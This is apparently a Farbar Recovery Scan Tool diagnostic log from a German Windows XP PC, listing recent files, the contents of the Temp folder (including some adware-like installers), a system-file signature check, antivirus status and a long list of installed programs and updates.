2014-11-11 10:17 - 2014-11-11 10:18 - 00077448 _____ () C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\GDIPFONTCACHEV1.DAT
2014-11-11 10:16 - 2014-11-11 10:32 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Avira
2014-11-11 10:16 - 2014-11-11 10:25 - 00000000 ____D () C:\Programme\Avira
2014-11-11 10:16 - 2014-11-11 10:16 - 00000840 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\Avira.lnk
2014-11-11 10:15 - 2014-11-11 18:20 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Package Cache
2014-11-11 10:15 - 2014-11-11 10:25 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Avira
2014-11-11 09:01 - 2014-11-11 09:01 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\Desktop\Hack
2014-11-03 20:14 - 2014-11-03 20:14 - 00000000 ____D () C:\Dokumente und Einstellungen\LocalService\Anwendungsdaten\McAfee
2014-10-26 18:26 - 2014-10-26 18:26 - 00017711 _____ () C:\Dokumente und Einstellungen\USER\.recently-used.xbel
2014-10-20 18:34 - 2014-10-20 18:34 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Java
2014-10-20 18:34 - 2014-10-20 18:34 - 00000000 _____ () C:\WINDOWS\system32\REN39.tmp
2014-10-20 18:34 - 2014-10-20 18:34 - 00000000 _____ () C:\WINDOWS\system32\REN38.tmp
2014-10-20 18:33 - 2014-10-20 18:34 - 00000151 _____ () C:\WINDOWS\system32\jupdate-1.7.0_71-b14.log
2014-10-20 18:31 - 2014-10-20 18:31 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\McAfee

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-12 13:16 - 2005-08-03 09:56 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp
2014-11-12 13:14 - 2013-05-30 14:27 - 00000884 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-11-12 12:32 - 2004-11-17 01:26 - 01238640 _____ () C:\WINDOWS\WindowsUpdate.log
2014-11-12 11:14 - 2012-07-29 20:36 - 00701104 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2014-11-12 11:14 - 2011-07-31 07:40 - 00071344 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2014-11-12 10:02 - 2004-11-17 01:26 - 00000668 _____ () C:\WINDOWS\win.ini
2014-11-12 10:02 - 2004-11-17 01:26 - 00000227 _____ () C:\WINDOWS\system.ini
2014-11-12 10:02 - 2004-11-17 01:22 - 00000211 __RSH () C:\boot.ini
2014-11-12 09:48 - 2004-11-17 01:26 - 00000259 _____ () C:\WINDOWS\wiadebug.log
2014-11-12 09:36 - 2014-03-22 08:07 - 00000232 _____ () C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP –  Benachrichtigung – Anmeldung.job
2014-11-12 09:36 - 2004-11-17 01:34 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-11-12 09:36 - 2004-11-17 01:26 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-11-11 22:04 - 2005-08-03 09:56 - 00000300 ___SH () C:\Dokumente und Einstellungen\USER\ntuser.ini
2014-11-11 22:04 - 2005-08-03 09:56 - 00000000 ____D () C:\Dokumente und Einstellungen\USER
2014-11-11 22:04 - 2004-11-17 01:26 - 00032590 _____ () C:\WINDOWS\SchedLgU.Txt
2014-11-11 19:49 - 2005-08-03 11:17 - 00002509 _____ () C:\Dokumente und Einstellungen\USER\Desktop\Microsoft Office Word 2003.lnk
2014-11-11 19:18 - 2007-05-13 21:34 - 00000424 ____H () C:\WINDOWS\Tasks\User_Feed_Synchronization-{C186E9D0-3AC4-4FDE-B049-0A85B9D00A62}.job
2014-11-11 18:51 - 2005-09-20 15:29 - 00000000 ___RD () C:\Dokumente und Einstellungen\USER\Eigene Dateien\Eigene Word Dokumente
2014-11-11 18:34 - 2012-07-29 19:13 - 00000000 ____D () C:\Programme\Mozilla Maintenance Service
2014-11-11 18:30 - 2004-11-17 01:22 - 00000000 ___RD () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme
2014-11-11 18:27 - 2010-03-13 19:21 - 00000000 ____D () C:\Programme\Mozilla Firefox
2014-11-11 18:20 - 2004-11-17 01:23 - 00000000 ___RD () C:\Programme
2014-11-11 15:23 - 2004-11-17 01:23 - 00000000 __SHD () C:\Dokumente und Einstellungen\LocalService
2014-11-11 14:11 - 2014-04-09 19:12 - 00021207 _____ () C:\WINDOWS\setupapi.log
2014-11-11 14:10 - 2004-11-17 01:30 - 00000000 ____D () C:\WINDOWS\repair
2014-11-11 14:09 - 2004-11-17 01:30 - 00000000 ____D () C:\WINDOWS\Registration
2014-11-11 10:12 - 2004-11-17 01:22 - 00000000 ___RD () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart
2014-11-11 08:45 - 2004-11-17 01:32 - 00001158 _____ () C:\WINDOWS\system32\wpa.dbl
2014-11-07 20:07 - 2014-02-08 11:19 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\Anwendungsdaten\FileZilla
2014-11-05 19:38 - 2012-07-29 19:54 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\Anwendungsdaten\Audacity
2014-11-05 18:40 - 2012-07-29 20:20 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\Eigene Dateien\Audio
2014-10-26 18:26 - 2009-04-18 16:34 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\Anwendungsdaten\gtk-2.0
2014-10-26 18:26 - 2009-04-18 16:24 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\.gimp-2.6
2014-10-26 12:54 - 2004-11-17 01:31 - 01180330 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-10-20 18:37 - 2005-08-03 11:19 - 00002537 _____ () C:\Dokumente und Einstellungen\USER\Desktop\Microsoft Office Excel 2003.lnk
2014-10-20 18:34 - 2012-05-07 16:36 - 00000000 ____D () C:\Programme\Java
2014-10-20 18:34 - 2005-09-21 19:20 - 00000000 ____D () C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Anwendungsdaten\Adobe
2014-10-15 21:05 - 2013-08-15 08:09 - 00000000 ____D () C:\WINDOWS\system32\MRT
2014-10-15 20:53 - 2005-08-03 20:31 - 100290944 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

Files to move or delete:
====================
C:\Dokumente und Einstellungen\USER\settings.dat


Some content of TEMP:
====================
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\6zyg6j5u.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\82r1q90z.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\ApnStub.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\AskSLib.dll
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\AutoDL%3FBundleId=10380_b19770de.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\avgnt.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\BackupSetup.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\FlashPlayerUpdate.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\FlashPlayerUpdate01.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\HelpInstaller_StartUp.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\inst.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\jre-6u17-windows-i586-iftw-rv.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\jre-6u23-windows-i586-iftw-rv.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\jre-6u37-windows-i586-iftw.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\jre-7u21-windows-i586-iftw.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\jre-7u71-windows-i586-iftw.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\pdf24-creator-update.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\SETUP.EXE
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\setup_wm.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\update.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\x9a1nv3t.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\ytb.exe
C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp\_isFD.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================

--- --- ---

--- --- ---

--- --- ---

FRST Additions Logfile:

Code:

ATTFilter

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 10-11-2014
Ran by USER at 2014-11-12 13:18:27
Running from C:\Dokumente und Einstellungen\USER\Eigene Dateien\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AntiVir PersonalEdition Classic Virenschutz (Disabled - Up to date) {00000000-0000-0000-0000-000000000000}
AV: Avira Desktop (Disabled - Up to date) {AD166499-45F9-482A-A743-FDD3350758C7}
AV: AntiVir PersonalEdition Classic Virenschutz (Disabled - Up to date) {804E5358-FFA4-00DA-0D24-347CA8A3377C}
AV: AntiVir PersonalEdition Classic Virenschutz (Disabled - Up to date) {804E5358-FFA4-00EB-0D24-347CA8A3377C}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.223 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.223 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.08) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
AFU DTMF (HKLM\...\{0631D861-6902-11D7-B321-0040AA441151}) (Version:  - )
Audacity 2.0.3 (HKLM\...\Audacity_is1) (Version: 2.0.3 - Audacity Team)
Avira (HKLM\...\{9480d4af-12b9-4e56-8034-4031ef6ab39d}) (Version: 1.1.25.25607 - Avira Operations GmbH & Co. KG)
Avira (Version: 1.1.25.25607 - Avira Operations GmbH & Co. KG) Hidden
Avira Free Antivirus (HKLM\...\Avira AntiVir Desktop) (Version: 14.0.7.342 - Avira)
Brother MFL-Pro Suite (HKLM\...\{A3FEC306-FBFF-4B0D-95B9-F9C67C65079E}) (Version: 1.00 - Brother Industries, Ltd.)
CDBurnerXP (HKLM\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.3.4643 - CDBurnerXP)
CDex extraction audio (HKLM\...\CDex) (Version:  - )
CMV-Beispielsammlung 2.0 (HKLM\...\CMV-Beispielsammlung 2.0_is1) (Version:  - CMV)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6021.5000 - Microsoft Corporation)
Creative-Systeminformationen (HKLM\...\SysInfo) (Version:  - )
ElsterFormular 2006/2007 (HKLM\...\{CBBCBE04-EA5E-4201-A924-E7ED3E8686AE}) (Version: 8.0.0.0 - Steuerverwaltung des Bundes und der Länder)
FileZilla Client 3.8.0 (HKLM\...\FileZilla Client) (Version: 3.8.0 - Tim Kosse)
GIMP 2.6.6 (HKLM\...\WinGimp-2.0_is1) (Version:  - )
honestech VHS to DVD 3.0 SE (HKLM\...\{2856F5EA-E98A-40E4-BAD6-8C644A4A3F3C}) (Version: 3.0 - honestech)
honestech VHS to DVD 3.0 SE (Version: 3.0 - Honest Technology) Hidden
Hotfix für Windows Internet Explorer 7 (KB947864) (Version: 1 - Microsoft Corporation) Hidden
Hotfix für Windows Media Player 11 (KB939683) (HKLM\...\KB939683) (Version:  - Microsoft Corporation)
Hotfix für Windows XP (KB2158563) (HKLM\...\KB2158563) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB2443685) (HKLM\...\KB2443685) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB2570791) (HKLM\...\KB2570791) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB2633952) (HKLM\...\KB2633952) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB2756822) (HKLM\...\KB2756822) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB2779562) (HKLM\...\KB2779562) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB952287) (HKLM\...\KB952287) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB961118) (HKLM\...\KB961118) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB970653-v3) (HKLM\...\KB970653-v3) (Version: 3 - Microsoft Corporation)
Hotfix für Windows XP (KB976098-v2) (HKLM\...\KB976098-v2) (Version: 2 - Microsoft Corporation)
Hotfix für Windows XP (KB979306) (HKLM\...\KB979306) (Version: 1 - Microsoft Corporation)
Hotfix für Windows XP (KB981793) (HKLM\...\KB981793) (Version: 1 - Microsoft Corporation)
Intel(R) Extreme Graphics 2 Driver (HKLM\...\{8A708DD8-A5E6-11D4-A706-000629E95E20}) (Version:  - )
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.710 - Oracle)
Java(TM) 6 Update 37 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216032FF}) (Version: 6.0.370 - Oracle)
LochMaster 4.0 (HKLM\...\LochMaster_40_is1) (Version:  - )
Mediaport (HKLM\...\Mediaport) (Version:  - )
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 German Language Pack (HKLM\...\{E78BFA60-5393-4C38-82AB-E8019E464EB4}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM\...\{90110407-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM\...\{90850407-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version:  - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 33.1 (x86 de) (HKLM\...\Mozilla Firefox 33.1 (x86 de)) (Version: 33.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 33.1 - Mozilla)
Mozilla Thunderbird 24.6.0 (x86 de) (HKLM\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla)
MSXML 4.0 SP2 (KB927978) (HKLM\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB936181) (HKLM\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PC-Linq (HKLM\...\{808FAA20-4C3A-11D4-8A57-00201853C903}) (Version:  - )
PDF24 Creator 6.3.2 (HKLM\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version:  - PDF24.org)
PDF-Viewer (HKLM\...\{8D273DE5-ABFA-4BD0-A9D7-EE9C971438C4}_is1) (Version: 2.0.41.2 - Tracker Software Products Ltd)
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version:  - )
Radio Amateur Callbook (HKLM\...\Radio Amateur Callbook) (Version:  - )
Recorder (HKLM\...\ST6UNST #1) (Version:  - )
ScanSoft PaperPort 11 (HKLM\...\{B6C89654-A6A2-477C-873B-724EC1C56407}) (Version: 11.1.0000 - Nuance Communications, Inc.)
Shockwave (HKLM\...\Shockwave) (Version:  - )
Sicherheitsupdate für Microsoft Windows (KB2564958) (HKLM\...\KB2564958) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Step by Step Interactive Training (KB898458) (HKLM\...\KB898458) (Version: 20050502.101010 - Microsoft Corporation)
Sicherheitsupdate für Step by Step Interactive Training (KB923723) (HKLM\...\KB923723) (Version: 20050502.101010 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 7 (KB2183461) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB2360131) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB2416400) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB928090) (Version: 20070117.120000 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB929969) (Version: 20061222.120000 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB931768) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB933566) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB937143) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB938127) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB939653) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB942615) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB944533) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB950759) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB953838) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB956390) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB958215) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB960714) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB961260) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB963027) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB969897) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB972260) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB974455) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB976325) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB978207) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 7 (KB982381) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Internet Explorer 8 (KB2360131) (HKLM\...\KB2360131-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2416400) (HKLM\...\KB2416400-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2482017) (HKLM\...\KB2482017-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2497640) (HKLM\...\KB2497640-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2510531) (HKLM\...\KB2510531-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2530548) (HKLM\...\KB2530548-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2544521) (HKLM\...\KB2544521-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2559049) (HKLM\...\KB2559049-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2586448) (HKLM\...\KB2586448-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2618444) (HKLM\...\KB2618444-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2647516) (HKLM\...\KB2647516-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2675157) (HKLM\...\KB2675157-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2699988) (HKLM\...\KB2699988-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2722913) (HKLM\...\KB2722913-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2744842) (HKLM\...\KB2744842-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2761465) (HKLM\...\KB2761465-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2799329) (HKLM\...\KB2799329-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2817183) (HKLM\...\KB2817183-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2829530) (HKLM\...\KB2829530-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2838727) (HKLM\...\KB2838727-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2846071) (HKLM\...\KB2846071-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2847204) (HKLM\...\KB2847204-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2862772) (HKLM\...\KB2862772-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2870699) (HKLM\...\KB2870699-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2879017) (HKLM\...\KB2879017-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2888505) (HKLM\...\KB2888505-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2898785) (HKLM\...\KB2898785-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2909210) (HKLM\...\KB2909210-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2909921) (HKLM\...\KB2909921-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2925418) (HKLM\...\KB2925418-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2936068) (HKLM\...\KB2936068-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB2964358) (HKLM\...\KB2964358-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB971961) (HKLM\...\KB971961-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB981332) (HKLM\...\KB981332-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Internet Explorer 8 (KB982381) (HKLM\...\KB982381-IE8) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB2378111) (HKLM\...\KB2378111_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB2834904) (HKLM\...\KB2834904_WM11) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB2834904-v2) (HKLM\...\KB2834904-v2_WM11) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB911564) (HKLM\...\KB911564) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB952069) (HKLM\...\KB952069_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB954155) (HKLM\...\KB954155_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB968816) (HKLM\...\KB968816_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB973540) (HKLM\...\KB973540_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB975558) (HKLM\...\KB975558_WM8) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player (KB978695) (HKLM\...\KB978695_WM9) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player 10 (KB911565) (Version:  - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows Media Player 10 (KB917734) (HKLM\...\KB917734_WMP10) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player 11 (KB936782) (HKLM\...\KB936782_WMP11) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player 11 (KB954154) (HKLM\...\KB954154_WM11) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows Media Player 6.4 (KB925398) (HKLM\...\KB925398_WMP64) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2079403) (HKLM\...\KB2079403) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2115168) (HKLM\...\KB2115168) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2121546) (HKLM\...\KB2121546) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2160329) (HKLM\...\KB2160329) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2229593) (HKLM\...\KB2229593) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2259922) (HKLM\...\KB2259922) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2279986) (HKLM\...\KB2279986) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2286198) (HKLM\...\KB2286198) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2296011) (HKLM\...\KB2296011) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2296199) (HKLM\...\KB2296199) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2347290) (HKLM\...\KB2347290) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2360937) (HKLM\...\KB2360937) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2387149) (HKLM\...\KB2387149) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2393802) (HKLM\...\KB2393802) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2412687) (HKLM\...\KB2412687) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2419632) (HKLM\...\KB2419632) (Version: 1 - Microsoft Corporation)
